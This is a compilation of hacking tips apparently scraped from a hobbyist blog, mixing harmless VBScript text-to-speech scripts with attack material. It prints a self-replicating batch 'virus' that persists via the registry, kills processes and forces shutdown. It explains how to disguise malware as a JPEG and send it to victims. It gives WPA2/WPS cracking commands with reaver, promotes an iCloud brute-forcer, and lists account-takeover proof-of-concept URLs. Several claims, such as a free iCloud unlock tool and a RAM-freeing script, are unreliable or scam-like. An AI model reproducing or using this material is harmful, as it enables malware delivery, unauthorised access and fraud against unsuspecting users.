Send WhatsApp Message Without Using Any Number

Hi friends, In previous post I've told you about how to hack your friend's whatsapp to read their conversation. In this post, I'll tell you how can you use WhatsApp without using your mobile number, i.e. WhatsApp without using any number. Friends, you might be knowing that Facebook has launched web version of the WhatsApp currently for the chrome browser
which is becoming very popular day by day.

 

 

For messaging anyone without using any number, do the following steps:

Steps:

• Uninstall WhatsApp from your Android phone.
• Download and install WhatsApp again.
• Block all messaging services on your phone. Keeping your phone to flight mode will automatically block all messaging services.
• Now open WhatsApp and Enter your number. In such case WhatsApp will accept numbers, but will not be able to send any verification message.
• WhatsApp verification is not yet done, so users will not be able to use it.
• Now WhatsApp wil ask you for alternate method of verification. Click on 'Verify through SMS' option and provide your email address.
  Press Send button and within 2 second, press Cancel button. This will stop the authorization process.
• Now another app Spoof Text Message will be needed to spoof the message.
• This app will ask for some details. Use below details :
• To: +447900347295 
• From: + (country code) ( mobile number) 
• Message: Your e-mail address

Now, your message will be sent from a spoof number and you can chat with your Friends with this spoofed number.

Magic trick in Google

Hello friends! I am going to tell you a magic that will surprise you and your friends. What they will see is this: you are at the Google homepage, and you casually ask someone to watch the Google logo. Then, you move two of your fingers to completely

cover the “o”s in the Google logo. When you remove your fingers, to much surprise, the letters “o” will be missing from the logo. Now you ask your friend to move her fingers over the missing “o”s. After your friend removes the fingers, the logo will be complete again!

 

The trick here? 

 

It’s not really the Google homepage you and your friend are looking at – it’s a fake page (www.darkartsmedia.com/Google.html). And when you click on the page, the letters of the logo will disappear after five seconds. 

Clicking again will make them reappear after five more seconds. 

So when you move your fingers to cover the Google logo, simply click anywhere on the page, and wait a bit before you remove your fingers… and when your friend covers the letters, you click again. (A third click, by the way, will change the page to an actual Google homepage so you can perform searches to “prove” the page is real.)

Enjoy hacking.

How to see hidden friends' list in facebook

Hi friends, you must have seen that facebook gives you different option to control your privacy settings, on your statuses, posts and even on friend list. If a friend has made their friend-list hidden (visibility set to "Only Me") then you can't check their friends, as I've done. But now, a new Free Chrome extension "Facebook Friends Mapper" can reveal all friends of such users.

How to use Facebook Friends Mapper Chrome extension?

1. Install Facebook Friends Mapper extension from Chrome web store.

2. Open Facebook Profile of user you want to target. 

3. You will find 'Reveal Friends' option on Friends tab.

4. Click on Reveal Friends and Bang!

Note: There must be at least one mutual friend of the user of which you want to reveal friend list, no matter victim is in your friend list or not.

How to Make Your Computer Talk to You

Single Use VBScripts

Creating a visual basic script is very easy and doesn’t require any special programs. Though there are programs you can use to write more highly advanced scripts, most programmers and people who dabble in writing scripts just use Microsoft’s Notepad.

Let’s start the process by opening Notepad. After you have opened Notepad all you need to do is type in the following code or simply copy and paste it into the notepad window. In order to change what your script makes the computer say, simply replace the section that says “The geeks shall inherit the earth” with whatever you want to hear.

dim speechobject
set speechobject=createobject("sapi.spvoice")
speechobject.speak "The geeks shall inherit the earth"

After you have successfully entered the text you wish to hear, just press “File,” and click on the “Save As…” option.


Find a place where you want to save the image. For this example, I am saving it to an empty folder in the Downloads directory. The important thing you need to do is give it a name that ends with .vbs. This will tell the computer that you are not saving a plain text file; rather, you are saving a VBScript. We will name this sample “Geek test.vbs” as shown below.




Now you can go ahead and close the notepad and navigate to the folder where you saved the VBScript.

 You will notice that the icon is not the normal TXT icon. It is a small blue scroll on a white backdrop. Double click on this icon to launch your single use script and listen to your text. Congratulations, you’ve just created your first script.

Now, to get the hang of it, try to create a few more scripts with any text you want to hear. Alternatively, you can right click on the VBScript and select the “Open with…” option then choose notepad to edit the text within the same file.

Text to Speech Script

Now that you know how to write a single use script and have probably played with it a few times, you may be getting a bit bored. That’s why we are going to kick it up a notch.
The next thing we will learn is how to create a script that is slightly more advanced than the single use script. This will create a dialog box that you can type text into and have it read back to you by your PC.
Start by opening up your notepad again and entering this script or copy and pasting it into the notepad window.

 Dim message, sapi
 message=InputBox("What shall I say, your Geekness?","I speak for you.")
 Set sapi=CreateObject("sapi.spvoice")
 sapi.Speak message

After the code has been entered, simply save the file as “Text to Speech.vbs” as shown earlier to finalize the script. Once it has been saved, navigate to the location where it is, and double click on it. You will notice that window is called “I speak for you.” and the prompt to enter text to be vocalized is “What shall I say, your Geekiness?” You can always alter these to say anything you want.

For now, let us enter “The geeks shall inherit the earth” then press the “OK” button to run the script and hear your text out loud.

Greetings VBScript Script

This is getting pretty fun, but your computer still isn’t interacting with you very much. Now we will try another simple script that takes into account the time of day as well as the appropriate response for the time of day. This script will read your computer’s time and, based on that, it will greet you in a certain way.
Start by opening your notepad and inserting this short script. You can replace the section that has the greetings of the day with any phrase you want to hear as well as replace Geekmeister with your own name.

Set Sapi = Wscript.CreateObject("SAPI.SpVoice")
 dim str
 if hour(time) < 12 then
 Sapi.speak "Good Morning Geekmeister "
 else
 if hour(time) > 12 then
 if hour(time) > 16 then
 Sapi.speak "Good evening Geekmeister "
 else
 Sapi.speak "Good afternoon Geekmeister "
 end if
 end if
 end if

Now you can save the text document as a VBS file. Once you have done that, go to the folder where it is saved and double click on it. Based on the time that your computer shows, it will either say “Good morning, good afternoon or good evening Geekmeister.”
The script tells it that if the clock reads anything before 12, it is morning, and that anything after 12 is afternoon; however, it also has a clause that says even if it is after 12, as long as the time is past 16:00 (4 pm) it becomes evening.

Time of Day VBScript Script

If you would like to get a little bit more advanced and receive the time, you can create a new notepad and enter this script.


The script may look complicated, but it is essentially telling your computer what to say and how to say it based on the time that is shown on your computer’s clock. You can always replace the “The current time is” with any introduction for the time that you want.

Set Sapi = Wscript.CreateObject("SAPI.SpVoice")
 Sapi.speak "The current time is"

if hour(time) > 12 then
 Sapi.speak hour(time)-12
 else
 if hour(time) = 0 then
 Sapi.speak "12"
 else
 Sapi.speak hour(time)
 end if
 end if

if minute(time) < 10 then
 Sapi.speak "o"
 if minute(time) < 1 then
 Sapi.speak "clock"
 else
 Sapi.speak minute(time)
 end if
 else
 Sapi.speak minute(time)
 end if

if hour(time) > 12 then
 Sapi.speak "P.M."
 else
 if hour(time) = 0 then
 if minute(time) = 0 then
 Sapi.speak "Midnight"
 else
 Sapi.speak "A.M."
 end if
 else
 if hour(time) = 12 then
 if minute(time) = 0 then
 Sapi.speak "Noon"
 else
 Sapi.speak "P.M."
 end if
 else
 Sapi.speak "A.M."
 end if
 end if
 end if

Now you just need to save the file as a VBScript as you did in the previous steps and then navigate to that folder. If everything went well, you should be able to double click on it and hear the computer tell you the time.

Startup Greeting

Now that you know how to make your computer greet you and tell you the time, how cool would it be if the computer would do that when you turn on the computer. It is actually very easy to do if you just combine the two scripts and put them in the right place.

Start by opening up Microsoft notepad and copying this code into the window. It is simply a copy of both codes combined for you. Remember that you can change the greeting to “What’s up dude, Hello Master, Greetings your almighty highness,” or anything you want your computer to say to you.

Set Sapi = Wscript.CreateObject("SAPI.SpVoice")
 dim str
 if hour(time) < 12 then
 Sapi.speak "Good Morning Geekmeister "
 else
 if hour(time) > 12 then
 if hour(time) > 16 then
 Sapi.speak "Good evening Geekmeister "
 else
 Sapi.speak "Good afternoon Geekmeister "
 end if
 end if
 end if
 Sapi.speak "The current time is"

if hour(time) > 12 then
 Sapi.speak hour(time)-12
 else
 if hour(time) = 0 then
 Sapi.speak "12"
 else
 Sapi.speak hour(time)
 end if
 end if

if minute(time) < 10 then
 Sapi.speak "o"
 if minute(time) < 1 then
 Sapi.speak "clock"
 else
 Sapi.speak minute(time)
 end if
 else
 Sapi.speak minute(time)
 end if

if hour(time) > 12 then
 Sapi.speak "P.M."
 else
 if hour(time) = 0 then
 if minute(time) = 0 then
 Sapi.speak "Midnight"
 else
 Sapi.speak "A.M."
 end if
 else
 if hour(time) = 12 then
 if minute(time) = 0 then
 Sapi.speak "Noon"
 else
 Sapi.speak "P.M."
 end if
 else
 Sapi.speak "A.M."
 end if
 end if
 end if

Once you have copied this entire code exactly as it is, into notepad, go ahead and save it as “Startup greeting.vbs”. It can also be called anything you want, but for the purposes of this demonstration, it is easier if we’re all on the same page. Now that it has been saved, you can double click on the VBScript file to hear it greet you and tell you the time.





If you want it to play when you turn on your computer, like Jarvis from Iron Man, simply select the file and drag it with your mouse down to the “Start button.” Without releasing your mouse move it onto “All

Programs” then find the “Startup” folder and release your mouse button.





If, for some reason this does not work for you, you can also manually navigate to the startup folder. You will first go to the folder where your “Startup greeting.vbs” is saved and copy it.

The next step is to type the following path into the top of any Explorer window and press “Enter”. You will just need to change USERNAME with the name you use for your computer account.

C:\Users\USERNAME\AppData\Roaming\Microsoft\
Windows\Start Menu\Programs\Startup

Once you are in the startup folder, just paste the vbs file and you are good to go. Now, the next time you start your computer and log in, it should automatically greet you and inform you of what time it is.





If you had any trouble creating any of the scripts, they are all free to download by using these links.

1. Geek Test
2. Greeting
3. Startup Greeting
4. Telling Time
5. Text to Speech

Kali-Linux Hacking WPA2 Passwords in Easy 5 Steps

 

 

 

 

 

Requirements:

 

1. Wireless card (support promiscuous mode)
2. Access point with WPA2 and WPS enables

1. Open our terminal (CTRL+ALT+T) and type airmon-ng

2. The next step we need to stop our wireless monitor mode by running airmon-ng stop wlan0

3. Now we ready to capture the wireless traffic around us. By running airodump-ng wlan0 our wireless interface will start capturing the data.

Information:

BSSID (Basic Service Set Identification): the MAC address of access point

PWR: Signal level reported by the card.

Beacons: Number of announcements packets sent by the AP

#Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.

#/s: Number of data packets per second measure over the last 10 seconds.

CH: Channel number (taken from beacon packets).

MB: Maximum speed supported by the AP. If MB = 11, it’s 802.11b, if MB = 22 it’s 802.11b+ and higher rates are 802.11g.

ENC: Encryption algorithm in use.

CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.

AUTH: The authentication protocol used.

ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4. From the step 3 above, we can find access point with encryption algorithm WPA2 and note the AP channel number. Now we will find out whether target AP has WPS enabled or not.

• wash -i wlan0 -c 8 -C -s

if the WPS Locked status is No, then we ready to crack and move to step 5.

5. The last step is cracking the WPA2 password using reaver.

• reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360

Because we already get the information from step 3 above, so my command look like this:

• reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360

it took about 2 hours to crack 13 characters WPA2 password .....

Mac Address Information

“Media Access Control”. Nothing to do with the Macintosh.

 In the world of hacking and specially Networking, you will often come across this term “MAC Address”. It is used in various hacks, but the majority doesn’t even knows what it is. So What exactly is it? What does it do? How it is used? Is it related to IP address?

The Media Access Control (MAC) address is a binary number used to uniquely identify computer network adapters. These numbers (sometimes called “hardware addresses”) are physically burned into the network hardware during the manufacturing process, or stored in firmware, and designed to not be modified. Some refer to them as “Ethernet addresses” for historical reasons, but most popular types of networks utilize MAC addressing including Ethernet, WiFi and Bluetooth.

Format of a MAC Address:
MMM.MMM.SSS.SSS

The leftmost 6 digits (24 bits) called “prefix” are associated with the adapter manufacturer. Each vendor registers and obtains MAC prefixes as assigned by the IEEE (Institute of Electrical and Electronics Engineers). Vendors often possess many prefix numbers associated with their different products. For example, the prefixes:
00:13:10, 00:25:9C and 68:7F:74 (plus many others) all belong to Linksys (Cisco Systems).

The rightmost digits of a MAC address represent an identification number for the specific device. Among all devices manufactured with the same vendor prefix, each is given their own unique 24-bit number. Note that hardware from different vendors may happen to share the same device portion of the address.
64-bit MAC Addresses:

While traditional MAC addresses are all 48 bits in length, a few types of networks require 64-bit addresses instead. “ZigBee” wireless home automation and other similar networks based on “IEEE 802.15.4″, for example, require 64-bit MAC addresses to be configured on their hardware devices. TCP/IP networks based on IPv6 also implement a different approach to communicating with MAC addresses compared to mainstream IPv4. Instead of 64-bit hardware addresses. (TECHNICAL: IPv6 automatically translates 48-bit MAC address to a 64-bit address by inserting a fixed (hardcoded) 16-bit value in between the vendor prefix and the device identifier. IPv6 calls these numbers “identifiers” to distinguish them from true 64-bit hardware addresses.)

 For example, a 48-bit MAC address-
00:25:96:12:34:56 might appear on an IPv6 network as say for example, in either of these two forms:
00:25:96:FF:FE:12:34:56
0025:96FF:FE12:3456
(They simply add in the remaining 16 bits containing known characters at a known position so it can be easily converted back and forth, if needed to. In above case, “FFFE” fills up the requirement.)

MAC vs. IP Address Relationship

TCP/IP networks use both MAC addresses and IP addresses but for separate purposes. A MAC address remains fixed to the device’s hardware while the IP address for that same device can be changed depending on its TCP/IP network configuration and ISP. Media Access Control operates at one Layer of the OSI model (Open Systems Interconnection) while Internet Protocol operates at another Layer, meaning they each do their own tasks without interfering with each other. This allows MAC addressing to support other kinds of networks besides TCP/IP.

IP networks manage the conversion between IP and MAC addresses using Address Resolution Protocol (ARP). Basically, ARP defines a set of rules according to which IP and MAC addresses can be related. So, all in all MAC addresses are simply a unique number assigned to a Network adapter. They help identifying the specific device to which a specific packet of information must reach in order to create a successful connection to exchange data. You need an address to send a mail, right? That is just what MAC addresses brings to the table.

How to Hide a Virus inside of your Picture?

Creating a dangerous virus using notepad

Here I give you instructions of making a highly dangerous virus using notepad!!

This virus has very very dangerous properties :-1.Copy itself into startup

2.Copy itself over one thousand times into random spots in your computer.

3.Hide its self and all other created files

4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computercopy this code into notepad and save as Greatgame.bat (while saving select all files instead of text ).

Here is the Code:

@Echo offcolor 4title 4title R.I.Pstartstartstartstart calccopy %0 %Systemroot%\Greatgame > nulreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nulcopy %0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +hRUNDLL32 USER32.DLL.SwapMouseButtonstart calcclstskill msnmsgrtskill LimeWiretskill iexploretskill NMainstartclscd %userprofile%\desktopcopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batcd %userprofile%My Documentscopy Greatgame.bat R.I.P.batcopy Greatgame.bat R.I.P.jpgcopy Greatgame.bat R.I.P.txtcopy Greatgame.bat R.I.P.execopy Greatgame.bat R.I.P.movcopy Greatgame.bat FixVirus.batstartstart calcclsmsg * R.I.Pmsg * R.I.Pshutdown -r -t 10 -c “VIRUS DETECTED”startstarttime 12:00:R.I.Pcd %usernameprofile%\desktopcopy Greatgame.bat %random%.batgoto RIP

 You are done making virus .

PLEASE DON’T  TEST IT ON YOUR COMPUTER:-

This was tutorial for making a batch file virus using notepad.You can also change the name of virus , after copying this code in notepad press CTRL + F and replace all the occurring of the word “Greatgame” with the name of your choice , but u also have to change name of the file.

Hide virus in image file

Here i’m explaining one method on how to hide virus in an image file. By using this trick, you can easily hide virus and keylogger in jpeg image file

If you want to hide virus, you will require following files:

I. Download the tools

1. Easy Binder. (free)
2. Image to Icon Converter. (free)
3. Icon Changer. (free)Download all the above files and now, you are ready to hide virus in jpeg.
II. Creating an Icon:
For this hack to work, you need an icon of image. Follow the steps below to create an icon:
1. Run Image to Icon Converter from downloaded files.

 Select the image in which you want to hide virus and then open this image in Image to icon converter. (Use image with size within 128 pixels. You can resize image using IrfanView. In IrfanView, Press Ctrl+R).- Now, click on 128 X 128 checkbox at bottom. Click on Size button and hit on 128 X 128.

2. Adjust image crop, if necessary. Hit on Make. Go to File -> Save and save it on your desktop for later use. Let this icon be “Icon.ico”.

III. Steps to hide virus:
1. Now, run Easy Binder.exe from file downloaded to see:

2. Click “+” button present at bottom pane, browse to your virus file named as Greatgame.bat file and add it. Again using same “+” button, add the image in which you want to hide virus.
3. Now, click on “Settings” present at top to see:

4. Now, click on button next to “Select an Icon” and browse to the “Icon.ico” file created in Step II.
5. Click on button next to “Set Output File” and enter the path where you want to save binded file. Hit on “File’s” tab in upper pane and then click on “Bind files”. Let this final file be “Binded.exe”.

NOTE: Now you got the virus file attached with an image file named “Binded.exe” and it will be detected by Anti virus, so you have to make it fully undetectable (FUD).

IV. Changing Extension and Icon:

1. After you are done with making your virus file FUD, Open My Computer and go to Tools -> Folder Options. Click on View tab and uncheck “Hide extension for known file types” and hit on OK.
2. Now, rename our “Binded.exe” to say “JessicaAlba.jpeg-JessicaAlba.com”
The format should be:
Imagename.jpeg – Any name.com
I have used JessicaAlba because I am using her image to hide my server.
3. Now, install Icon Changer on your computer obtained from downloaded files. Right click on our binded file and hit on “Change Icon”. Hit on Folder icon next to “Search icons in” as shown:

4. In the dialog box, click on Desktop and hit OK. Now, our Icon.ico will be displayed. Select it and hit on “Set”.

You will see your final virus like this:

Note: Usually, .exe extension creates a doubt in victim’s mind. So, we are using .com extension to fool victim. Usually, people don’t have knowledge of .com extension and out of “JessicaAlba.jpeg-Jessica1.com” they consider “JessicaAlba.jpeg” as image name with .jpeg as image extension. This fools the victim.

That’s it friends. We are successful to hide virus in a jpeg image. Now, send this binded image file to your victim and whenever he will run the image on his computer, your sent hidden virus will be installed on victim computer without his knowledge.

How to Hack Instagram Account

Nir Goldshlager Founder of Break Security find the critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos.

1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram Include OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar,  Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,

So, first,  checked Instagram’s OAuth protocol:  (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.


In addition, redirection was only allowed to go to the owner app domain.
Thus, hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.

Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token

Hacking Facebook Account with just a text message

SMS F to 32665 to HACK accounts

Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?

Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any

Facebook account within a minute by doing one SMS. Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username. According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php

This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.

As attacker, follow these steps to execute hack:

1. Change value of profile_id to the Victim's profile_id value by tampering the parameters.

2. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back.

3. Enter that code in the box or as confirmation_code parameter value and Submit the form.

Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile.

In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.

Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password!

Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.

In return, Facebook paying $20,000 to fin1te as Bug Bounty.

How to send friends request when you got blocked - Best way

Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow to add strangers as your friends. You might have gone through a stage at least once in your Facebook account when a message appears i.e. your friend request is blocked for 1 day, 3 days, or even 30 days. You can not send friend request on Facebook to anyone whether you know him or not when you are blocked. This is because Facebook doesn’t let to send friend request to unknown people and considers it as spam and therefore temporarily disable sending friend requests when you violate its rules. This is generally done to secure privacy of people and some people by adding strangers as their friendmake misuse of that thing.

However, sometimes you may even get blocked when you send friend requestto known people but there are a lot of friend requesting awaiting approval pending already. I have also gone from this same stage, and feel helpless that we can’t send friend request to dear friends. So today i will tell you an easy trick with which you can send friend request even

if you are blocked.

 

 Ok lets start 

1 open this link -https://www.facebook.com/?sk=ff

2. then click on other tools

If you don’t know the easiest way to make contact file then follow these steps.

• Open new text document (.txt) in notepad.
• Add all the email addresses separated by a comma ( , ).
• Now save that file with the extension .vcf
• Now this is your contact file.
• Now Upload this file to Facebook. and you will be prompted to send friend request.

 Click “OK”and You’re done

Simple yet effective! Your friend request would be sent to desired people.

If you are not blocked from sending Friend Requests but still you get warnings like ‘This Friend Request Can’t Be Sent

we soon make a post how to bypass facebook error This Friend Request Can’t Be Sent

How to Bypass iColud Activation Lock

iCloud Apple iD BruteForcer 

This tool is released by "Pr0x13" at GitHub. Attackers to break into any iCloud account, potentially giving them free access to victims’ iOS devices.

How to Install: 

Put in HtDocs Folder in your Xampp installation.

Install cUrl for your OS

Navigate to http://127.0.0.1/iDict/ in your web browser (preferably Firefox, Chrome, or Safari).

Wordlist.txt is from iBrute and it satisfies iCloud password Requirements

It's been reported if icloud server responds with an error restart xampp or 

your computer

-=Reports coming in that Server is now Patched with Rate Limiter=-

-=Server Fully Patched, Discontinue use if you don't want to lock your account!!=-

What is this?

A 100% Working iCloud Apple ID Dictionary attack that bypasses 

Account Lockout restrictions and Secondary Authentication on any account.

What this isn't:

A bypass or fully automated removal

Why? 

This bug is painfully obvious and was only a matter of time before it was 

privately used for malicious or nefarious activities, I publicly disclosed it so apple will patch it.

Download now

Credit: @Pr0x13

How to Unlock iCloud Activation Lock

First is need to Download the hack tool on your pc. Go on Download Button below and get this software. We give this for free, not is need to pay.

Unlock iCloud Lock Download BypassTool

Server – 1

Server - 2

Step 1. Download and Unzip the file on your PC.

Step 2. Start this hack tool on your PC. Connect your iPhone via USB cable.

Step 3. Then click on Start button to process bypass icloud lock service.

Step 4. Wait five min to be complete this process. When will be done click OK.

The finaly process is when this will be complete to install the latest versizon on iTunes on your PC. Then make Restore Update on your device and icloud lock will be permanent removed from your apple device. This is official factory unlock on iCloud lock directly from Apple Database Servers.

Many services in the world talk for this on net, but be careful, many of them is scam. We this service give you for free, and not like to give money to us. Only Download this hack tool and enjoy.

Dear Readers if like to Unlock for Not free in five min your iCloud Lock on your iPhone go here on this Factory Unlock iPhone company. This is safely service we test. – iPhoneOfficialUnlock

Source

Disclaimer: This post is knowledge purpose only. 

We are not responsible for any damage done whatsoever to anyones iCloud account or iDevices.

♠♣Hack #35♠♣

"Note-hack"(Folder with password)
>Want to create a Hidden Folder with Password??
>Open Notepad and copy whole script given below...

 @ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== 2mind goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

>Now save this file by naming "Locker.bat" at specific place.
now run the file and it will ask you for password type "2mind" without Quotes.
>this will create a folder where you have saved this "Locker.bat file
>Put whatever you wanna Hide and again click on Locker.bat file to hide that Folder
Boom! the folder is Hidden. If you face any problem, Feel free to ask, Enjoy..

♠♣Hack #34♠♣
"Mobile-Tech-Hack" (Balance)
How To Check Mobile Balance of Your Friends
With this Tips you can check the mobile balance of your Friends in Airtel, Docomo, Idea and Bsnl .
Just Dial below Given Number for Checking you Friends Balance :
Airtel – 09810198101
Docomo – 09040012345 or 07737012345
Idea – 09824012345
Bsnl – 9415100123 (only for up) .
After Dialing Select language > Already Operator user > Enter Your Friends Number .
Done !
If in Airtel it will ask for Pin then use 1234 as Pin Number .
Note By 2Mind Solutions :
Docomo Number is Toll Free but in other numbers Charges are apply as Std Call Rates .
This Trick is tested many times and 100 % Working
 
 Enjoy it 

♠♣Hack #33♠♣
"Notepad-Hacks"
Want to make your keyboard lights Dancing?
>Open Notepad
>Copy this
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
> Now save this file named Dancing.vbs and enjoy the show tongue emoticon
•••Note: Its one type of small virus but doesn't harm any of your system file..
At-last if you want to close that script just press CTRL+ALT+DELETE
> go in Process tab and have a look for
>"wscript.exe"
>right click on it
>"End Process" and
>yes
Share it and enjoy

Hack #32
"Tech-Hack"(RAM)
If your computer is slow?
then clean up the ram..

>Open notepad
>type FREEMEM=SPACE(64000000)
>Save it as ram.vbs
now run the script.
Check out !!

Hack #31
"Tech-Hack" (Whatsapp)
Hide Whatsapp Images and Videos from Gallery ->
Note: Android must be rooted

Step 1 : Install ES file explorer -> Google Play
Step 2 : Open ES File Explorer
Step 3 : Navigate to internal SD Card
Step 4 : Select Whatsapp folder by pressing the icon for a few seconds
Step 5 : Click 3 dotted but on right bottom
Step 6 : Click hide. Voila!!! Check your gallery.

Hack #30
"Social-Hack"
Before going to suspicious site,
Google "safebrowsing:(website)" to see a 90-day history of malware attempts on its visitors.
Be safe